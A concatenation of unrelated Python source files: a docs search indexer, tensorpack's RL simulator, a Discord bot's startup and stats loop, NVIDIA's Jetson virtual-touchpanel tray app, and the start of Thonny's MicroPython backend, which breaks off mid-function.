self.index_alias, self.index_name)
self.search_client.aliasadd(self.index_alias)
self.clear_old_indexes()
def build_hierarchy(self, doc: SearchDocument):
"""
Build the hierarchy of pages "above" this document.
At this point, we've already crawled all the URLs that we're going to
index, and we added the URLs and page titles to the `seen_urls`
dictionary.
Now, for this document, we're going to walk through the parts of its
URL and reconstruct the page titles for those pages. We don't need
the root page title of the site, so we leave that out of the
hierarchy.
So, for example, if we're indexing the site https://docs.redislabs.com/latest
and we have a document whose URL is:
https://docs.redislabs.com/latest/ri/using-redisinsight/cluster-management/
We're going to look up the titles of the following URLs:
https://docs.redislabs.com/latest/ri
https://docs.redislabs.com/latest/ri/using-redisinsight
And we'll come up with the following hierarchy:
["RedisInsight", "Using RedisInsight", "Cluster Management"]
Because URLs might contain trailing slashes, and we might have a mix
of URLs with and without trailing slashes, we always remove the
trailing slash when we add a URL to `seen_urls` and then we remove
any trailing slashes again when we look up a URL.
"""
hierarchy = []
url = doc.url.replace(self.site.url, "").replace("//", "/").strip("/")
parts = url.split("/")
joinable_site_url = self.site.url.rstrip("/")
for i, part in enumerate(parts):
path_url = "/".join([joinable_site_url, *parts[:i], part])
page = self.seen_urls.get(path_url)
if page:
hierarchy.append(page)
if not hierarchy:
log.debug('URL lacks hierarchy: %s', url)
return hierarchy
def index(self, force: bool = False):
if not force:
try:
self.debounce()
except DebounceError as e:
log.error("Debounced indexing task: %s", e)
return
if self.redis.exists(self.lock):
log.info("Skipping index due to presence of lock %s", self.lock)
return
# Set a lock per URL while indexing.
self.redis.set(self.lock, 1, ex=INDEXING_LOCK_TIMEOUT)
docs_to_process = Queue()
Spider = type(
'Spider', (DocumentationSpiderBase, ), {"site_config": self.site})
def enqueue_document(signal, sender, item: SearchDocument, response,
spider):
"""Queue a SearchDocument for indexation."""
url_without_slash = item.url.rstrip("/")
# Don't index the root page. There is probably a better way to
# do this with Scrapy!
if url_without_slash == self.site.url.rstrip("/"):
return
# Remove any escape slashes -- we don't want to include escape characters
# within the hierarchy JSON because json.loads() can't parse them...
self.seen_urls[url_without_slash] = item.title.replace("//", "")
self.seen_ids |= {item.doc_id}
docs_to_process.put(item)
def index_documents():
while True:
doc: SearchDocument = docs_to_process.get()
try:
self.index_document(doc)
except Exception as e:
log.error(
"Unexpected error while indexing doc %s, error: %s",
doc.doc_id, e)
docs_to_process.task_done()
def start_indexing():
if docs_to_process.empty():
# Don't keep around an empty search index.
self.redis.execute_command('FT.DROPINDEX', self.index_name)
return
for _ in range(MAX_THREADS):
Thread(target=index_documents, daemon=True).start()
self.redis.set(self.keys.last_index(self.site.url),
datetime.datetime.now().timestamp())
docs_to_process.join()
self.create_index_alias()
self.clear_old_hashes()
self.redis.delete(self.lock)
dispatcher.connect(enqueue_document, signal=signals.item_scraped)
dispatcher.connect(start_indexing, signal=signals.engine_stopped)
process = CrawlerProcess(
settings={
'CONCURRENT_ITEMS': 200,
'CONCURRENT_REQUESTS': 100,
'CONCURRENT_REQUESTS_PER_DOMAIN': 100,
'HTTP_CACHE_ENABLED': True,
'REACTOR_THREADPOOL_MAXSIZE': 30,
'LOG_LEVEL': 'ERROR'
})
log.info("Started crawling")
process.crawl(Spider)
process.start()
|
simulator.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: simulator.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import tensorflow as tf
import multiprocessing as mp
import time
import os
import threading
from abc import abstractmethod, ABCMeta
from collections import defaultdict
import six
from six.moves import queue
import zmq
from tensorpack.models.common import disable_layer_logging
from tensorpack.callbacks import Callback
from tensorpack.tfutils.varmanip import SessionUpdate
from tensorpack.predict import OfflinePredictor
from tensorpack.utils import logger
from tensorpack.utils.serialize import loads, dumps
from tensorpack.utils.concurrency import LoopThread, ensure_proc_terminate
__all__ = ['SimulatorProcess', 'SimulatorMaster',
'SimulatorProcessStateExchange',
'TransitionExperience']
class TransitionExperience(object):
""" A transition of state, or experience"""
def __init__(self, state, action, reward, **kwargs):
""" kwargs: whatever other attribute you want to save"""
self.state = state
self.action = action
self.reward = reward
for k, v in six.iteritems(kwargs):
setattr(self, k, v)
@six.add_metaclass(ABCMeta)
class SimulatorProcessBase(mp.Process):
def __init__(self, idx):
super(SimulatorProcessBase, self).__init__()
self.idx = int(idx)
self.name = u'simulator-{}'.format(self.idx)
self.identity = self.name.encode('utf-8')
@abstractmethod
def _build_player(self):
pass
class SimulatorProcessStateExchange(SimulatorProcessBase):
"""
A process that simulates a player and communicates to master to
send states and receive the next action
"""
def __init__(self, idx, pipe_c2s, pipe_s2c):
"""
:param idx: idx of this process
"""
super(SimulatorProcessStateExchange, self).__init__(idx)
self.c2s = pipe_c2s
self.s2c = pipe_s2c
def run(self):
player = self._build_player()
context = zmq.Context()
c2s_socket = context.socket(zmq.PUSH)
c2s_socket.setsockopt(zmq.IDENTITY, self.identity)
c2s_socket.set_hwm(2)
c2s_socket.connect(self.c2s)
s2c_socket = context.socket(zmq.DEALER)
s2c_socket.setsockopt(zmq.IDENTITY, self.identity)
# s2c_socket.set_hwm(5)
s2c_socket.connect(self.s2c)
state = player.current_state()
reward, isOver = 0, False
while True:
c2s_socket.send(dumps(
(self.identity, state, reward, isOver)),
copy=False)
action = loads(s2c_socket.recv(copy=False).bytes)
reward, isOver = player.action(action)
state = player.current_state()
# compatibility
SimulatorProcess = SimulatorProcessStateExchange
class SimulatorMaster(threading.Thread):
""" A base thread to communicate with all StateExchangeSimulatorProcess.
It should produce action for each simulator, as well as
defining callbacks when a transition or an episode is finished.
"""
class ClientState(object):
def __init__(self):
self.memory = [] # list of Experience
def __init__(self, pipe_c2s, pipe_s2c):
super(SimulatorMaster, self).__init__()
assert os.name != 'nt', "Doesn't support windows!"
self.daemon = True
self.name = 'SimulatorMaster'
self.context = zmq.Context()
self.c2s_socket = self.context.socket(zmq.PULL)
self.c2s_socket.bind(pipe_c2s)
self.c2s_socket.set_hwm(10)
self.s2c_socket = self.context.socket(zmq.ROUTER)
self.s2c_socket.bind(pipe_s2c)
self.s2c_socket.set_hwm(10)
# queueing messages to client
self.send_queue = queue.Queue(maxsize=100)
def f():
msg = self.send_queue.get()
self.s2c_socket.send_multipart(msg, copy=False)
self.send_thread = LoopThread(f)
self.send_thread.daemon = True
self.send_thread.start()
# make sure socket get closed at the end
def clean_context(soks, context):
for s in soks:
s.close()
context.term()
import atexit
atexit.register(clean_context, [self.c2s_socket, self.s2c_socket], self.context)
def run(self):
self.clients = defaultdict(self.ClientState)
try:
while True:
msg = loads(self.c2s_socket.recv(copy=False).bytes)
ident, state, reward, isOver = msg
# TODO check history and warn about dead client
client = self.clients[ident]
# check if reward&isOver is valid
# in the first message, only state is valid
if len(client.memory) > 0:
client.memory[-1].reward = reward
if isOver:
self._on_episode_over(ident)
else:
self._on_datapoint(ident)
# feed state and return action
self._on_state(state, ident)
except zmq.ContextTerminated:
logger.info("[Simulator] Context was terminated.")
@abstractmethod
def _on_state(self, state, ident):
"""response to state sent by ident. Preferrably an async call"""
@abstractmethod
def _on_episode_over(self, client):
""" callback when the client just finished an episode.
You may want to clear the client's memory in this callback.
"""
def _on_datapoint(self, client):
""" callback when the client just finished a transition
"""
def __del__(self):
self.context.destroy(linger=0)
# ------------------- the following code are not used at all. Just experimental
class SimulatorProcessDF(SimulatorProcessBase):
""" A simulator which contains a forward model itself, allowing
it to produce data points directly """
def __init__(self, idx, pipe_c2s):
super(SimulatorProcessDF, self).__init__(idx)
self.pipe_c2s = pipe_c2s
def run(self):
self.player = self._build_player()
self.ctx = zmq.Context()
self.c2s_socket = self.ctx.socket(zmq.PUSH)
self.c2s_socket.setsockopt(zmq.IDENTITY, self.identity)
self.c2s_socket.set_hwm(5)
self.c2s_socket.connect(self.pipe_c2s)
self._prepare()
for dp in self.get_data():
self.c2s_socket.send(dumps(dp), copy=False)
@abstractmethod
def _prepare(self):
pass
@abstractmethod
def get_data(self):
pass
class SimulatorProcessSharedWeight(SimulatorProcessDF):
""" A simulator process with an extra thread waiting for event,
and take shared weight from shm.
Start me under some CUDA_VISIBLE_DEVICES set!
"""
def __init__(self, idx, pipe_c2s, condvar, shared_dic, pred_config):
super(SimulatorProcessSharedWeight, self).__init__(idx, pipe_c2s)
self.condvar = condvar
self.shared_dic = shared_dic
self.pred_config = pred_config
def _prepare(self):
disable_layer_logging()
self.predictor = OfflinePredictor(self.pred_config)
with self.predictor.graph.as_default():
vars_to_update = self._params_to_update()
self.sess_updater = SessionUpdate(
self.predictor.session, vars_to_update)
# TODO setup callback for explore?
self.predictor.graph.finalize()
self.weight_lock = threading.Lock()
# start a thread to wait for notification
def func():
self.condvar.acquire()
while True:
self.condvar.wait()
self._trigger_evt()
self.evt_th = threading.Thread(target=func)
self.evt_th.daemon = True
self.evt_th.start()
def _trigger_evt(self):
with self.weight_lock:
self.sess_updater.update(self.shared_dic['params'])
logger.info("Updated.")
def _params_to_update(self):
# can be overwritten to update more params
return tf.trainable_variables()
class WeightSync(Callback):
""" Sync weight from main process to shared_dic and notify"""
def __init__(self, condvar, shared_dic):
self.condvar = condvar
self.shared_dic = shared_dic
def _setup_graph(self):
self.vars = self._params_to_update()
def _params_to_update(self):
# can be overwritten to update more params
return tf.trainable_variables()
def _before_train(self):
self._sync()
def _trigger_epoch(self):
self._sync()
def _sync(self):
logger.info("Updating weights ...")
dic = {v.name: v.eval() for v in self.vars}
self.shared_dic['params'] = dic
self.condvar.acquire()
self.condvar.notify_all()
self.condvar.release()
if __name__ == '__main__':
import random
from tensorpack.RL import NaiveRLEnvironment
class NaiveSimulator(SimulatorProcess):
def _build_player(self):
return NaiveRLEnvironment()
class NaiveActioner(SimulatorMaster):
def _get_action(self, state):
time.sleep(1)
return random.randint(1, 12)
def _on_episode_over(self, client):
# print("Over: ", client.memory)
client.memory = []
client.state = 0
name = 'ipc://whatever'
procs = [NaiveSimulator(k, name) for k in range(10)]
[k.start() for k in procs]
th = NaiveActioner(name)
ensure_proc_terminate(procs)
th.start()
time.sleep(100)
|
ready_loop.py
|
# Called when the bot is ready to be used
import asyncio
import datetime
import sqlite3
import threading
import time
import discord
import flask
from Data.Constants.import_const import Login, Ids, Main_bot, Useful
from Script.import_emojis import Emojis
if Main_bot:
discord_token = Login["discord"]["token"]
else:
discord_token = Login["discord"]["beta"]
async def ready_loop(self):
support_server = self.get_guild(Ids["Support_server"])
member_role = discord.utils.get(support_server.roles, name="Member")
for member in support_server.members:
if (member_role not in member.roles) and (not member.bot):
await member.add_roles(member_role)
if Main_bot:
status_channel = self.get_channel(Ids["Status_channel"])
msg = await status_channel.send(f"{Emojis['Yes']} Connected")
await msg.edit(content=f"{Emojis['Yes']} Connected `{msg.created_at.replace(microsecond=0).isoformat(sep=' ')}` UTC-0")
clash_info = self
def thread_weekly_stats():
while True:
date = datetime.datetime.now()
monday = datetime.date.today() + datetime.timedelta(days=(7 - date.weekday()))
monday = datetime.datetime(monday.year, monday.month, monday.day)
diff = monday - date
time.sleep(diff.seconds + diff.days * 24 * 3600)
print("Weekly Stats", datetime.datetime.now())
# ===== WEEKLY STATS =====
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class WeeklyStatsBot(discord.Client):
def __init__(self):
super().__init__()
async def on_ready(self):
channel = self.get_channel(Ids["Weekly_stats_channel"])
old_servers_count = 0
async for message in channel.history(limit=None):
if message.is_system():
await message.delete()
if message.pinned:
old_servers_count = int(message.content)
await message.delete()
break
msg = await channel.send(str(len(clash_info.guilds)))
await msg.pin()
diff_servers_count = len(clash_info.guilds) - old_servers_count
diff_servers_count = "%+d" % diff_servers_count
await channel.send(f"Evolution of number of servers this week : {diff_servers_count}")
await self.logout()
weekly_stats_bot = WeeklyStatsBot()
try:
loop.run_until_complete(weekly_stats_bot.start(discord_token))
except KeyboardInterrupt:
loop.run_until_complete(weekly_stats_bot.close())
finally:
loop.close()
thread = threading.Thread(target=thread_weekly_stats)
thread.start()
def thread_monthly_users():
while True:
date = datetime.datetime.now()
if date.month < 12:
day1 = datetime.datetime(date.year, date.month + 1, 1)
else:
day1 = datetime.datetime(date.year + 1, 1, 1)
diff = day1 - date
time.sleep(diff.seconds + diff.days * 24 * 3600 + 3600) # 1h00 instead of 0h00 to avoid conflicts with WeeklyStats
print("Monthly Users Stats", datetime.datetime.now())
# ===== MONTHLY USERS =====
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class MonthlyUsersBot(discord.Client):
def __init__(self):
super().__init__()
async def on_ready(self):
connection = sqlite3.connect(Useful["secure_folder_path"] + "Modifiable.sqlite")
cursor = connection.cursor()
cursor.execute("SELECT COUNT(*) FROM BotUsage")
nb_monthly_users = cursor.fetchone()[0]
text = f"Monthly users : {nb_monthly_users}"
channel = self.get_channel(Ids["Monthly_stats_channel"])
await channel.send(text)
if len(str(date.month)) == 1:
month = f"0{date.month}"
else:
month = str(date.month)
w = f"""CREATE TABLE IF NOT EXISTS BotUsage_{date.year}_{month} AS SELECT * FROM BotUsage"""
cursor.execute(w)
cursor.execute("DELETE FROM BotUsage")
connection.commit()
await self.logout()
monthly_users_bot = MonthlyUsersBot()
try:
loop.run_until_complete(monthly_users_bot.start(discord_token))
except KeyboardInterrupt:
loop.run_until_complete(monthly_users_bot.close())
finally:
loop.close()
thread = threading.Thread(target=thread_monthly_users)
thread.start()
def thread_webhooks_app():
app = flask.Flask(__name__)
@app.route('/topgg_webhook', methods=['post'])
def topgg_webhook():
if (flask.request.remote_addr != "159.203.105.187") or ("Authorization" not in list(flask.request.headers.keys())) or (flask.request.headers["Authorization"] != Login["topgg"]["authorization"]):
authorization = None if "Authorization" not in list(flask.request.headers.keys()) else flask.request.headers["Authorization"]
print(f"Unauthorized :\nIP = {flask.request.remote_addr}\nAuthorization = {authorization}")
return flask.Response(status=401)
def run_bot(voter_id):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class WebhooksBot(discord.Client):
def __init__(self):
super().__init__()
async def on_ready(self):
import json
from Script.import_functions import create_embed
from Data.Constants.useful import Useful
from Data.Variables.import_var import Votes
user = clash_info.get_user(voter_id)
votes_channel = self.get_channel(Ids["Votes_channel"])
if user.id not in list(Votes.keys()):
Votes[user.id] = 1
else:
Votes[user.id] += 1
json_text = json.dumps(Votes, sort_keys=True, indent=4)
def_votes = open(f"{Useful['secure_folder_path']}votes.json", "w")
def_votes.write(json_text)
def_votes.close()
vote_copy = dict(Votes)
vote = {}
for member_id, member_votes in vote_copy.items():
member = clash_info.get_user(int(member_id))
vote[member.mention] = member_votes
vote = sorted(vote.items(), key=lambda t: t[1])
text = ""
for user_vote_tuple in vote:
text += f"{user_vote_tuple[0]} has voted {user_vote_tuple[1]} times\n"
embed = create_embed(f"{user} has voted for Clash INFO", text, votes_channel.guild.me.color, "", votes_channel.guild.me.avatar_url)
await votes_channel.send(embed=embed)
await self.logout()
webhooks_bot = WebhooksBot()
try:
loop.run_until_complete(webhooks_bot.start(discord_token))
except KeyboardInterrupt:
loop.run_until_complete(webhooks_bot.close())
finally:
loop.close()
import threading
thread = threading.Thread(target=run_bot, kwargs={"voter_id": int(flask.request.get_json()["user"])})
thread.start()
return flask.Response(status=200)
app.run(host="0.0.0.0", port=8080)
thread = threading.Thread(target=thread_webhooks_app, args=())
thread.start()
print("Connected")
nb_guilds = len(self.guilds)
act = discord.Activity(type=discord.ActivityType.watching, name=f"{nb_guilds: ,} servers")
await self.change_presence(status=discord.Status.online, activity=act)
return
|
vtouch_indicator.py
|
# Copyright (c) 2020-2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import gi
import subprocess
import time
import threading
import re
import sys
import multiprocessing as mp
import zmq
import vtouch as vt
zmq_host = "127.0.0.1"
zmq_port = "5001"
gi.require_version("Gtk", "3.0")
gi.require_version('AppIndicator3', '0.1')
gi.require_version('Notify', '0.7')
from gi.repository import Gtk as gtk
from gi.repository import AppIndicator3 as appindicator
from gi.repository import Notify as notify
from gi.repository import GObject
INDICATOR_ID = 'vtouchindicator'
SELF_DIR = os.path.dirname(os.path.abspath(__file__))
ICON_DEFAULT = os.path.join(SELF_DIR, 'assets/icons/icon_vtouch.svg')
evt_queue = mp.Queue()
last_timestamp = mp.Value('d', time.time())
framerate = mp.Value('i', 0)
def about(self):
dialog = gtk.MessageDialog(
transient_for=None,
flags=0,
message_type=gtk.MessageType.INFO,
buttons=gtk.ButtonsType.OK,
text="Jetson Virtual Touchpanel",
)
dialog.format_secondary_text(
"This tool uses a camera to detect users' handpose to control the system mouse cursor. \
\nIt is primarily designed for interactive signage systems, freeing users from physically touching a mouse or a touchpanel. \
\n \
\nhttps://github.com/NVIDIA-AI-IOT/jetson_virtual_touchpanel"
)
dialog.run()
print("INFO dialog closed")
dialog.destroy()
def start(_):
import getpass
USER = getpass.getuser()
cmd = ("x-terminal-emulator --title='handpose-camera service' -e \
/home/" + str(USER) + "/jetson-pose-container/run.sh \
--run python3 ./_host_home/jetson_virtual_touchpanel/pub/trtpose_handpose/pub_hand_msg_thread.py \
").split()
subprocess.call(cmd)
def stop(_):
#cmd = "docker ps -a -q --filter ancestor=jetson-pose"
cmd = "docker ps | grep 'jetson-pose' | awk '{print $1}'"
container_id = subprocess.check_output(cmd, shell=True).decode("utf-8")
print(container_id)
cmd = "docker stop " + container_id
subprocess.call(cmd.split())
def quit(_):
running.clear()
proc_subscriber.terminate()
evt_queue.put(None)
gtk.main_quit()
def build_menu():
menu = gtk.Menu()
item_about = gtk.MenuItem('About Virtual Touchpanel ...')
item_about.connect('activate', about)
menu.append(item_about)
menu.append(gtk.SeparatorMenuItem())
item_start = gtk.MenuItem('Start camera-pose service')
item_start.connect('activate', start)
menu.append(item_start)
item_stop = gtk.MenuItem('Stop camera-pose service')
item_stop.connect('activate', stop)
menu.append(item_stop)
menu.append(gtk.SeparatorMenuItem())
item_quit = gtk.MenuItem('Quit')
item_quit.connect('activate', quit)
menu.append(item_quit)
menu.show_all()
return menu
def mess_callback():
pass
def trtpose_subscriber(running, last_timestamp, framerate):
print("--- Subscriber thread ---")
frame_number = 0 # number of message recived in the last 1 sec interval
# Creates a socket instance
context = zmq.Context()
socket = context.socket(zmq.SUB)
# Connects to a bound socket
socket.connect("tcp://{}:{}".format(zmq_host, zmq_port))
# Subscribes to all topics
socket.subscribe("")
last_gesture = ""
curr_gesture = ""
while True:
# Receives a string format message
msg = socket.recv_json()
cur_timestamp = time.time()
curr_gesture = msg['gesture']
x = msg['objects'][0]['keypoints'][5]['x']
y = msg['objects'][0]['keypoints'][5]['y']
#print("[" + str(x) + "," + str(y) + "] (received at " + str(cur_timestamp) + ")")
if (x != 0 or y != 0):
model.set_mouse_coord((224-x)/224 * 1920, y/224 * 1080)
if ( last_gesture == "point" and curr_gesture == "click"):
print(" ===========> trigger_mouse_click")
model.trigger_mouse_click(1);
last_gesture = curr_gesture
if (cur_timestamp % 1.0 < last_timestamp.value % 1.0):
framerate = frame_number
print("framerate = " + str(framerate))
frame_number = 0
else:
frame_number += 1
last_timestamp.value = cur_timestamp
def trtpose_monitor(running, last_timestamp):
print("--- Monitor process ---")
trtpose_active = False
while running.is_set():
cur_timestamp = time.time()
#print("cur: " + str(cur_timestamp) + ", last_timestamp: " + str(last_timestamp.value))
if cur_timestamp - last_timestamp.value > 0.5:
if trtpose_active == True:
print("trt_pose stopped")
trtpose_active = False
else:
if trtpose_active == False:
print("trt_pose started")
trtpose_active = True
update_icon(trtpose_active)
do_notify(trtpose_active)
time.sleep(0.5)
def check_trtpose_activity():
threading.Timer(1.0, check_trtpose_activity).start()
print("Hello, World!" + str(time.time()))
def update_icon(status):
if(status):
indicator.set_icon(os.path.join(SELF_DIR, 'assets/icons/icon_vtouch.svg'))
else:
indicator.set_icon(os.path.join(SELF_DIR, 'assets/icons/icon_vtouch_inactive.svg'))
def do_notify(status):
msg_lines = []
if(status):
msg_lines.append(f"Service 'handpose-camera' started")
else:
msg_lines.append(f"Service 'handpose-camera' stopped")
msg = '\n'.join(msg_lines)
notification.update(msg)
notification.set_timeout(1000) #milliseconds
notification.set_urgency(0)
notification.show()
model = vt.vtouch()
indicator = appindicator.Indicator.new(INDICATOR_ID, ICON_DEFAULT, appindicator.IndicatorCategory.SYSTEM_SERVICES)
indicator.set_status(appindicator.IndicatorStatus.ACTIVE)
indicator.set_menu(build_menu())
notify.init(INDICATOR_ID)
notification = notify.Notification()
running = threading.Event()
running.set()
proc_subscriber = mp.Process(target=trtpose_subscriber, args=(running, last_timestamp, framerate))
proc_subscriber.start()
thrd_monitor = threading.Thread(target=trtpose_monitor, args=(running, last_timestamp))
thrd_monitor.start()
gtk.main()
|
backend.py
|
from thonny.common import (
InputSubmission,
InterruptCommand,
EOFCommand,
parse_message,
ToplevelCommand,
ToplevelResponse,
InlineCommand,
InlineResponse,
UserError,
serialize_message,
BackendEvent,
ValueInfo,
execute_system_command,
)
import sys
import logging
import traceback
import queue
from thonny.plugins.micropython.connection import (
ConnectionClosedException,
ConnectionFailedException,
)
from textwrap import dedent
import ast
import re
from queue import Queue, Empty
import threading
import os
import time
from thonny.misc_utils import find_volumes_by_name, sizeof_fmt
import jedi
import io
import tokenize
from thonny.running import EXPECTED_TERMINATION_CODE
import binascii
import shutil
from threading import Lock
# See https://github.com/dhylands/rshell/blob/master/rshell/main.py
# for UART_BUFFER_SIZE vs USB_BUFFER_SIZE
# ampy uses 32 bytes: https://github.com/pycampers/ampy/blob/master/ampy/files.py
# I'm not worrying so much, because reader thread reads continuously
# and writer (SerialConnection) has it's own blocks and delays
BUFFER_SIZE = 512
BAUDRATE = 115200
ENCODING = "utf-8"
# Commands
RAW_MODE_CMD = b"\x01"
NORMAL_MODE_CMD = b"\x02"
INTERRUPT_CMD = b"\x03"
SOFT_REBOOT_CMD = b"\x04"
# Output tokens
VALUE_REPR_START = b"<repr>"
VALUE_REPR_END = b"</repr>"
STX = b"\x02"
EOT = b"\x04"
NORMAL_PROMPT = b">>> "
LF = b"\n"
OK = b"OK"
# first prompt when switching to raw mode (or after soft reboot in raw mode)
# Looks like it's not translatable in CP
# https://github.com/adafruit/circuitpython/blob/master/locale/circuitpython.pot
FIRST_RAW_PROMPT = b"raw REPL; CTRL-B to exit\r\n>"
FIRST_RAW_PROMPT_SUFFIX = b"\r\n>"
RAW_PROMPT = b">"
# How many seconds to wait for something that should appear quickly.
# In other words -- how long to wait with reporting a protocol error
# (hoping that the required piece is still coming)
WAIT_OR_CRASH_TIMEOUT = 3
SECONDS_IN_YEAR = 60 * 60 * 24 * 365
FALLBACK_BUILTIN_MODULES = [
"cmath",
"gc",
"math",
"sys",
"array",
# "binascii", # don't include it, as it may give false signal for reader/writer
"collections",
"errno",
"hashlib",
"heapq",
"io",
"json",
"os",
"re",
"select",
"socket",
"ssl",
"struct",
"time",
"zlib",
"_thread",
"btree",
"framebuf",
"machine",
"micropython",
"network",
"bluetooth",
"cryptolib",
"ctypes",
"pyb",
"esp",
"esp32",
]
logger = logging.getLogger("thonny.micropython.backend")
def debug(msg):
return
print(msg, file=sys.stderr)
class MicroPythonBackend:
def __init__(self, connection, clean, api_stubs_path):
self._connection = connection
self._local_cwd = None
self._cwd = None
self._command_queue = Queue() # populated by reader thread
self._progress_times = {}
self._api_stubs_path = api_stubs_path
self._command_reading_thread = threading.Thread(target=self._read_commands, daemon=True)
self._command_reading_thread.start()
self._startup_time = time.time()
self._interrupt_suggestion_given = False
self._writing_lock = Lock()
try:
self._prepare(clean)
self._mainloop()
except ConnectionClosedException as e:
self._on_connection_closed(e)
except Exception:
logger.exception("Crash in backend")
traceback.print_exc()
def _prepare(self, clean):
if clean:
self._interrupt_to_raw_prompt()
self._clear_environment()
else:
self._connection.write(RAW_MODE_CMD)
self._forward_output_until_active_prompt()
self._cwd = self._fetch_cwd()
self._welcome_text = self._fetch_welcome_text()
self._builtin_modules = self._fetch_builtin_modules()
self._builtins_info = self._fetch_builtins_info()
self._send_ready_message()
def _mainloop(self):
while True:
self._check_for_connection_errors()
try:
cmd = self._command_queue.get(timeout=0.1)
except Empty:
# No command in queue, but maybe a thread produced output meanwhile
# or the user resetted the device
self._forward_unexpected_output()
continue
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(False)
else:
self.handle_command(cmd)
def _fetch_welcome_text(self):
self._connection.write(NORMAL_MODE_CMD)
welcome_text = self._connection.read_until(NORMAL_PROMPT).strip(b"\r\n >")
if os.name != "nt":
welcome_text = welcome_text.replace(b"\r\n", b"\n")
# Go back to raw prompt
self._connection.write(RAW_MODE_CMD)
self._connection.read_until(FIRST_RAW_PROMPT)
return welcome_text.decode(ENCODING, errors="replace")
def _fetch_uname(self):
res = self._evaluate("__thonny_os.uname()", prelude="import os as __thonny_os")
return {
"sysname": res[0],
"nodename": res[1],
"release": res[2],
"version": res[3],
"machine": res[4],
}
def _fetch_builtin_modules(self):
out = self._execute_and_capture_output("help('modules')")
if out is None:
self._send_error_message(
"Could not query builtin modules. Code completion may not work properly."
)
return FALLBACK_BUILTIN_MODULES
modules_str_lines = out.strip().splitlines()
last_line = modules_str_lines[-1].strip()
if last_line.count(" ") > 0 and " " not in last_line and "\t" not in last_line:
# probably something like "plus any modules on the filesystem"
# (can be in different languages)
modules_str_lines = modules_str_lines[:-1]
modules_str = (
" ".join(modules_str_lines)
.replace("/__init__", "")
.replace("__main__", "")
.replace("/", ".")
)
return modules_str.split()
def _fetch_builtins_info(self):
"""
for p in self._get_api_stubs_path():
builtins_file = os.path.join(p, "__builtins__.py")
if os.path.exists(builtins_file):
return parse_api_information(builtins_file)
"""
path = os.path.join(self._api_stubs_path, "builtins.py")
if os.path.exists(path):
return parse_api_information(path)
else:
return {}
def _fetch_cwd(self):
return self._evaluate(
"__thonny_os.getcwd() if hasattr(__thonny_os, 'getcwd') else ''",
prelude="import os as __thonny_os",
)
def _send_ready_message(self):
self.send_message(ToplevelResponse(welcome_text=self._welcome_text, cwd=self._cwd))
def _check_send_inline_progress(self, cmd, value, maximum, description=None):
assert "id" in cmd
prev_time = self._progress_times.get(cmd["id"], 0)
if value != maximum and time.time() - prev_time < 0.2:
# Don't notify too often
return
else:
self._progress_times[cmd["id"]] = time.time()
if description is None:
description = cmd.get("description", "Working...")
self.send_message(
BackendEvent(
event_type="InlineProgress",
command_id=cmd["id"],
value=value,
maximum=maximum,
description=description,
)
)
def _interrupt_to_raw_prompt(self):
# NB! Sometimes disconnecting and reconnecting (on macOS?)
# too quickly causes anomalies. See CalliopeMiniProxy for more details
discarded_bytes = b""
for delay in [0.05, 0.5, 0.1, 1.0, 3.0, 5.0]:
# Interrupt several times, because with some drivers first interrupts seem to vanish
if delay >= 1:
self._show_error(
"Could not enter REPL. Trying again with %d second waiting time..." % delay
)
self._connection.reset_output_buffer()
self._connection.write(INTERRUPT_CMD)
self._connection.write(RAW_MODE_CMD)
time.sleep(delay)
discarded_bytes += self._connection.read_all()
if discarded_bytes.endswith(FIRST_RAW_PROMPT) or discarded_bytes.endswith(b"\r\n>"):
break
else:
max_tail_length = 500
if len(discarded_bytes) > max_tail_length:
discarded_bytes_str = (
"[skipping %d bytes] ..." % (len(discarded_bytes) - max_tail_length)
) + repr(discarded_bytes[:-max_tail_length])
else:
discarded_bytes_str = repr(discarded_bytes)
self._show_error(
"Could not enter REPL. Giving up. Read bytes:\n"
+ discarded_bytes_str
+ "\n\nYour options:\n\n"
+ " - check connection properties;\n"
+ " - make sure the device has suitable firmware;\n"
+ " - make sure the device is not in bootloader mode;\n"
+ " - reset the device and try again;\n"
+ " - try other serial clients (Putty, TeraTerm, screen, ...);\n"
+ " - ask for help in Thonny's forum or issue tracker."
)
sys.exit()
def _soft_reboot(self, side_command):
if side_command:
self._interrupt_to_raw_prompt()
# Need to go to normal mode. MP doesn't run user code in raw mode
# (CP does, but it doesn't hurt to do it there as well)
self._connection.write(NORMAL_MODE_CMD)
self._connection.read_until(NORMAL_PROMPT)
self._connection.write(SOFT_REBOOT_CMD)
if not side_command:
self._forward_output_until_active_prompt()
self.send_message(ToplevelResponse(cwd=self._cwd))
def _read_commands(self):
"works in separate thread"
while True:
line = sys.stdin.readline()
if line == "":
logger.info("Read stdin EOF")
sys.exit()
cmd = parse_message(line)
if isinstance(cmd, InterruptCommand):
# This is a priority command and will be handled right away
self._interrupt_in_command_reading_thread()
else:
self._command_queue.put(cmd)
def _interrupt_in_command_reading_thread(self):
with self._writing_lock:
# don't interrupt while command or input is being written
self._connection.write(INTERRUPT_CMD)
time.sleep(0.1)
self._connection.write(INTERRUPT_CMD)
time.sleep(0.1)
self._connection.write(INTERRUPT_CMD)
print("sent interrupt")
def handle_command(self, cmd):
assert isinstance(cmd, (ToplevelCommand, InlineCommand))
if "local_cwd" in cmd:
self._local_cwd = cmd["local_cwd"]
def create_error_response(**kw):
if not "error" in kw:
kw["error"] = traceback.format_exc()
if isinstance(cmd, ToplevelCommand):
return ToplevelResponse(command_name=cmd.name, **kw)
else:
return InlineResponse(command_name=cmd.name, **kw)
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is None:
response = create_error_response(error="Unknown command: " + cmd.name)
else:
try:
response = handler(cmd)
except SystemExit:
# Must be caused by Thonny or plugins code
if isinstance(cmd, ToplevelCommand):
traceback.print_exc()
response = create_error_response(SystemExit=True)
except UserError as e:
sys.stderr.write(str(e) + "\n")
response = create_error_response()
except KeyboardInterrupt:
